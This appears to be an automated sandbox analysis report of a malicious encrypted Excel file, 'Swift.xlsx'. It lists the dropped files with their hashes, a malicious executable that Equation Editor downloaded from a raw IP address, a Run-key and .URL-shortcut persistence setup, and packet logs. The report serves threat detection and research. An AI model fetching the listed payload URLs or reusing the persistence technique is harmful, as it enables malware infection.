      17:06:16 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Zxsdvph C:\Users\Public\Libraries\hpvdsxZ.url

                                Joe Sandbox View / Context

                                IPs

                                No context

                                Domains

                                No context

                                ASN


                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\Zxsdvphcjqafchepqbzkmcuuxncavgi[1]
                                Process:C:\Users\Public\vbc.exe
                                File Type:data
                                Category:downloaded
                                Size (bytes):283648
                                Entropy (8bit):7.995115183379276
                                Encrypted:true
                                SSDEEP:6144:kbRih06RY9HgIU6kWhhxTE+duyRvxu8TXVIipNEl+yRDz16w:kbV6S9HgfRMTqyw8ZIipNEJF1f
                                MD5:53F221DDB7579A8E507E321ECF3708E9
                                SHA1:1DBA52E74B99A3B5168C60C56198C5BA6FEBB0F5
                                SHA-256:D8BE7A5A708F32C4EA7144081EF5F48D95C2F611F0C1224DAAD8211A95A48E1B
                                SHA-512:FB1EC9E3D4B4D726153D247E0F6AC600716FDD7882240A9971CFD388B9D7C981A6F224FB8D9B373CB3A1CAEBC8C26F7DA390152283B40092F692D152D2D1B476
                                Malicious:false
                                Reputation:low
                                IE Cache URL:https://hqpyda.bl.files.1drv.com/y4mRb80zT4MmCWKR90qGE-mduUvM9xXJnPMC6NLwMgoSnGtkryGuu1yCC3ty6JRPR4pc7f57Fq15iid421o3jIQHqVM0AgPPo_DSJkv2uQFXLhpioaelpoVnYkLeSTdEPG_xrxSVd_dCmSvpBHCa-Mk3fMnpqbJzSBQWevfN3FRiXmhlJhz8-lRoklD0oeocwR_XeBpinzKoPzTgM4KIsI6Rw/Zxsdvphcjqafchepqbzkmcuuxncavgi?download&psid=1
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:downloaded
                                Size (bytes):1014784
                                Entropy (8bit):6.809458920712055
                                Encrypted:false
                                SSDEEP:12288:GrHeuodar6Dd3m4aS9FCZXhGiX1d0uVrLGaDOdJ4NUTj94rv4lprmi:GDe0W1m4aVNTc9jOij2rqpm
                                MD5:A65B1815177EF9EBA7E5E894BBF65A3C
                                SHA1:5459ECF044E62BFB53220D0E78A5B98C24F17E25
                                SHA-256:298D542746DFA4922DD5FBC8FAB572BE58447C9DBD1481C55BD2254BB275684F
                                SHA-512:0F05D5E05D51FBE5289330CA2C5486C49369728005C6D19B548D3F419FBF52F25AA50007271B315636AEDB311A43485989E4F6DE8154869D0AC7AFFB0F0E3DB1
                                Malicious:true
                                Reputation:low
                                IE Cache URL:http://192.3.222.155/008008/vbc.exe
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1D9161B0.png
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):10202
                                Entropy (8bit):7.870143202588524
                                Encrypted:false
                                SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                MD5:66EF10508ED9AE9871D59F267FBE15AA
                                SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2930BD79.png
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                Category:dropped
                                Size (bytes):11303
                                Entropy (8bit):7.909402464702408
                                Encrypted:false
                                SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                Malicious:false
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\38A6D1D2.png
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):68702
                                Entropy (8bit):7.960564589117156
                                Encrypted:false
                                SSDEEP:1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
                                MD5:9B8C6AB5CD2CC1A2622CC4BB10D745C0
                                SHA1:E3C68E3F16AE0A3544720238440EDCE12DFC900E
                                SHA-256:AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
                                SHA-512:407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
                                Malicious:false
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3C8D526.png
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):10202
                                Entropy (8bit):7.870143202588524
                                Encrypted:false
                                SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                MD5:66EF10508ED9AE9871D59F267FBE15AA
                                SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                Malicious:false
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\42F2BF3.png
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:PNG image data, 838 x 469, 8-bit colormap, non-interlaced
                                Category:dropped
                                Size (bytes):21987
                                Entropy (8bit):7.952828365949915
                                Encrypted:false
                                SSDEEP:384:MoaqtIZxNY3dMzKeijXyso4gYhVZAUrE68p/DazS396RFnDUhkhiedxQ9:AqtIZzYNM+HjXyjOhVZW68pPWGedO9
                                MD5:5A25F525D9F0D658AF52A4F78FE031D4
                                SHA1:525FB63F75E745FBC90E4E42E624E030C5DF94EB
                                SHA-256:D791841D657B6D2A9E5ED1B7F8548B1044A2C7EC62D05846C72D8556DB9E9BC8
                                SHA-512:FE2F2D9744CE7235F4DBC36861249372C42B85920B6A1C75A8B2C330BD07F7C4C12A5DF5CA9AAED4C2BCDAD9D196DFF3A34732EE296FE6F006A16ACC41F5EEC3
                                Malicious:false
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4CA30D58.png
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):68702
                                Entropy (8bit):7.960564589117156
                                Encrypted:false
                                SSDEEP:1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
                                MD5:9B8C6AB5CD2CC1A2622CC4BB10D745C0
                                SHA1:E3C68E3F16AE0A3544720238440EDCE12DFC900E
                                SHA-256:AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
                                SHA-512:407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
                                Malicious:false
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6D5F6EF.jpeg
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                Category:dropped
                                Size (bytes):85020
                                Entropy (8bit):7.2472785111025875
                                Encrypted:false
                                SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                MD5:738BDB90A9D8929A5FB2D06775F3336F
                                SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                Malicious:false
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B697C424.png
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:PNG image data, 737 x 456, 8-bit/color RGB, non-interlaced
                                Category:dropped
                                Size (bytes):83904
                                Entropy (8bit):7.986000888791215
                                Encrypted:false
                                SSDEEP:1536:xNzYthYR7Iu3TjzBH8lXtvmNy2k8KYpNNNQ64nBLEMoknbRVmnN6:xNzUGxDjeOs2kSNSBh24
                                MD5:9F9A7311810407794A153B7C74AED720
                                SHA1:EDEE8AE29407870DB468F9B23D8C171FBB0AE41C
                                SHA-256:000586368A635172F65B169B41B993F69B5C3181372862258DFAD6F9449F16CD
                                SHA-512:27FC1C21B8CB81607E28A55A32ED895DF16943E9D044C80BEC96C90D6D805999D4E2E5D4EFDE2AA06DB0F46805900B4F75DFC69B58614143EBF27908B79DDA42
                                Malicious:false
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BA1488DD.emf
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                Category:dropped
                                Size (bytes):498420
                                Entropy (8bit):0.6411729750186352
                                Encrypted:false
                                SSDEEP:384:KXXwBkNWZ3cJuUvmWnTG+W4DH8ddxzsFfW3:sXwBkNWZ3cjvmWa+VDO
                                MD5:E34E1237F085DEB7E5C5B938C6C659B2
                                SHA1:AEA96141A3412AFB7E145F49944BE893CA3FB164
                                SHA-256:CE27BA7228F10D6C4C087926A2C74D644921CBFD3F9843F4FADD4C71073F1AC6
                                SHA-512:677DD541ADC14DE4EAC107A2D7242930B47CA79F7F25832D02B0FB14B7665F62CF3F3884CA75672F594C7EFA9729DBED364947C1783D9CFCC5025C4690C2E8F3
                                Malicious:false
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D59453AB.png
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                Category:dropped
                                Size (bytes):11303
                                Entropy (8bit):7.909402464702408
                                Encrypted:false
                                SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                Malicious:false
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E55F4DD5.png
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:PNG image data, 838 x 469, 8-bit colormap, non-interlaced
                                Category:dropped
                                Size (bytes):21987
                                Entropy (8bit):7.952828365949915
                                Encrypted:false
                                SSDEEP:384:MoaqtIZxNY3dMzKeijXyso4gYhVZAUrE68p/DazS396RFnDUhkhiedxQ9:AqtIZzYNM+HjXyjOhVZW68pPWGedO9
                                MD5:5A25F525D9F0D658AF52A4F78FE031D4
                                SHA1:525FB63F75E745FBC90E4E42E624E030C5DF94EB
                                SHA-256:D791841D657B6D2A9E5ED1B7F8548B1044A2C7EC62D05846C72D8556DB9E9BC8
                                SHA-512:FE2F2D9744CE7235F4DBC36861249372C42B85920B6A1C75A8B2C330BD07F7C4C12A5DF5CA9AAED4C2BCDAD9D196DFF3A34732EE296FE6F006A16ACC41F5EEC3
                                Malicious:false
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F77E15F1.jpeg
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                Category:dropped
                                Size (bytes):85020
                                Entropy (8bit):7.2472785111025875
                                Encrypted:false
                                SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                MD5:738BDB90A9D8929A5FB2D06775F3336F
                                SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                Malicious:false
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FF28013A.png
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:PNG image data, 737 x 456, 8-bit/color RGB, non-interlaced
                                Category:dropped
                                Size (bytes):83904
                                Entropy (8bit):7.986000888791215
                                Encrypted:false
                                SSDEEP:1536:xNzYthYR7Iu3TjzBH8lXtvmNy2k8KYpNNNQ64nBLEMoknbRVmnN6:xNzUGxDjeOs2kSNSBh24
                                MD5:9F9A7311810407794A153B7C74AED720
                                SHA1:EDEE8AE29407870DB468F9B23D8C171FBB0AE41C
                                SHA-256:000586368A635172F65B169B41B993F69B5C3181372862258DFAD6F9449F16CD
                                SHA-512:27FC1C21B8CB81607E28A55A32ED895DF16943E9D044C80BEC96C90D6D805999D4E2E5D4EFDE2AA06DB0F46805900B4F75DFC69B58614143EBF27908B79DDA42
                                Malicious:false
                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\KZ513KEB.txt
                                Process:C:\Users\Public\vbc.exe
                                File Type:ASCII text
                                Category:downloaded
                                Size (bytes):63
                                Entropy (8bit):4.0467575593287775
                                Encrypted:false
                                SSDEEP:3:vpqMLJUQ2Vxlx2EPHUYfvMTe:vEMWXVfxxPUsvMTe
                                MD5:6D7988E636E80D4FFABE1D866AB3BDF2
                                SHA1:CDB275A3662EF35B1C67B943AF4F893DD02BD9EC
                                SHA-256:8AB16B651DB65729715FA67C72DBC1246B5977949628B9CB86AAB7B6AD96D8E8
                                SHA-512:5C7AD1D306631945FFEA2677CBA9F3A3120E5F9F1DC79E7AF8FFB1AFD8A33FC5FEB91F08196F29705EB38106EEFF09155F2F133A9F7F5C336064AA04B3EFC4BB
                                Malicious:false
                                IE Cache URL:live.com/
                                Preview: wla42..live.com/.1536.375019136.30918084.4169104966.30916751.*.
                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\ZI4B61S9.txt
                                Process:C:\Users\Public\vbc.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):63
                                Entropy (8bit):4.023713852754437
                                Encrypted:false
                                SSDEEP:3:vpqMLJUQ2XaS2EPrZ84lTe:vEMWXX5xjVlTe
                                MD5:5729B36FD27014124F593B32CF5EFCE9
                                SHA1:297A777F996A254F93931AD3B061E83809ED17A5
                                SHA-256:329B0562784F8FB7C67C0B116C15C73DCD837AD78EAE005A34F077681184A91A
                                SHA-512:4B948139C3F33E81CAE06AE24490A318495013FAC34DDCF9F78C5F6763555F78317DEDE2B2F7960198422D1D273935599F287F7CA23E8D481397EEC8A65F459C
                                Malicious:false
                                Preview: wla42..live.com/.1536.355019136.30918084.4143604054.30916751.*.
                                C:\Users\user\Desktop\~$Swift.xlsx
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):165
                                Entropy (8bit):1.4377382811115937
                                Encrypted:false
                                SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                MD5:797869BB881CFBCDAC2064F92B26E46F
                                SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                Malicious:false
                                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe
                                Process:C:\Users\Public\vbc.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):1014784
                                Entropy (8bit):6.809458920712055
                                Encrypted:false
                                SSDEEP:12288:GrHeuodar6Dd3m4aS9FCZXhGiX1d0uVrLGaDOdJ4NUTj94rv4lprmi:GDe0W1m4aVNTc9jOij2rqpm
                                MD5:A65B1815177EF9EBA7E5E894BBF65A3C
                                SHA1:5459ECF044E62BFB53220D0E78A5B98C24F17E25
                                SHA-256:298D542746DFA4922DD5FBC8FAB572BE58447C9DBD1481C55BD2254BB275684F
                                SHA-512:0F05D5E05D51FBE5289330CA2C5486C49369728005C6D19B548D3F419FBF52F25AA50007271B315636AEDB311A43485989E4F6DE8154869D0AC7AFFB0F0E3DB1
                                Malicious:true
                                C:\Users\Public\Libraries\hpvdsxZ.url
                                Process:C:\Users\Public\vbc.exe
                                File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Zxsdvph\\Zxsdvph.exe">), ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):96
                                Entropy (8bit):4.866547012067739
                                Encrypted:false
                                SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMxWlVt/dWlViASsGKd6ov:HRYFVmTWDyz+8uPiASsbDv
                                MD5:C115406F74CA774E3B1F5F2037D15E84
                                SHA1:8109B72A1B04D79574D5A7BA652A813A390AE637
                                SHA-256:B012DBEB68164BD92020760E7D57A5B21B0D73255005BBE708A19C201D3C9F1C
                                SHA-512:991F4A6639148929BFE6EDBD804C40A28A9166DB47D9959D4494D9DF963C8752A0E0D415341B078B7B2ECB721F3DD0D7E1AB251DF55106C9D2E6B678B116208E
                                Malicious:false
                                Yara Hits:
                                • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\hpvdsxZ.url, Author: @itsreallynick (Nick Carr)
                                Preview: [InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Zxsdvph\\Zxsdvph.exe"..IconIndex=2..
                                C:\Users\Public\vbc.exe
                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):1014784
                                Entropy (8bit):6.809458920712055
                                Encrypted:false
                                SSDEEP:12288:GrHeuodar6Dd3m4aS9FCZXhGiX1d0uVrLGaDOdJ4NUTj94rv4lprmi:GDe0W1m4aVNTc9jOij2rqpm
                                MD5:A65B1815177EF9EBA7E5E894BBF65A3C
                                SHA1:5459ECF044E62BFB53220D0E78A5B98C24F17E25
                                SHA-256:298D542746DFA4922DD5FBC8FAB572BE58447C9DBD1481C55BD2254BB275684F
                                SHA-512:0F05D5E05D51FBE5289330CA2C5486C49369728005C6D19B548D3F419FBF52F25AA50007271B315636AEDB311A43485989E4F6DE8154869D0AC7AFFB0F0E3DB1
                                Malicious:true

                                Static File Info

                                General

                                File type:CDFV2 Encrypted
                                Entropy (8bit):7.972337446998264
                                TrID:
                                • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                File name:Swift.xlsx
                                File size:341944
                                MD5:9a43d5d2ffc56e823280ca84f6bb870f
                                SHA1:f0945075b44bc2cb2c96b168d47a269eb0d714ce
                                SHA256:88c07a30074065b292335ae5d4a45f905fa8a6739d3031d2f8236d2d9a27c681
                                SHA512:b46f3e608f57ae5156336355f0c7bf90ab655f3db16a0318ee0ac6b16e01ee8b5ed4eab78e3662093f9b3d2cae0bbdc9811367b3bb1ccf39098abe731ff2dd67
                                SSDEEP:6144:1+24gh/BSPohIzJutURE/sI/j16YhtJHUf8HslNtrF5HyY8d:1+24gh/Chk1BlUf8ctrFYxd

                                File Icon

                                Icon Hash:e4e2aa8aa4b4bcb4

                                Network Behavior

                                TCP Packets

                                Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                Oct 13, 2021 17:05:26.456373930 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.456418991 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.456458092 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.456506968 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.456552029 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.456598997 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.456638098 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.456675053 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.456676960 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.456716061 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.456754923 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.456842899 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.456855059 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.456860065 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.456865072 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.456865072 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.456870079 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.456873894 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.456904888 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.456911087 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.456912041 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.456949949 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.456989050 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.456990957 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.457036018 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.457063913 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.457072020 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.458285093 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.458327055 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.458365917 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.458403111 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.458405018 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.458441019 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.458441019 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.458472013 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.458478928 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.458507061 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.458517075 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.458537102 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.458543062 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.458564043 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.458575010 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.458606958 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.458630085 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.458643913 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.458662033 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.458683014 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.458703041 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.458720922 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.458733082 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.458756924 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.458786011 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.458796024 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.458816051 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.458832979 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.458853006 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.458892107 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.458899021 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.458935022 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.458969116 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.458972931 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.459021091 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.459068060 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.459104061 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.459135056 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.459141970 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.459144115 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.459146976 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.459213018 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.459232092 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.459270000 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.459280968 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.459323883 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.459336996 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.459387064 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.459398031 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.459449053 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.459453106 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.459502935 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.459513903 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.459563017 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.459567070 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.459624052 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.459630966 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.459681034 CEST8049167192.3.222.155192.168.2.22
                                Oct 13, 2021 17:05:26.459700108 CEST4916780192.168.2.22192.3.222.155
                                Oct 13, 2021 17:05:26.459737062 CEST8049167192.3.222.155192.168.2.22
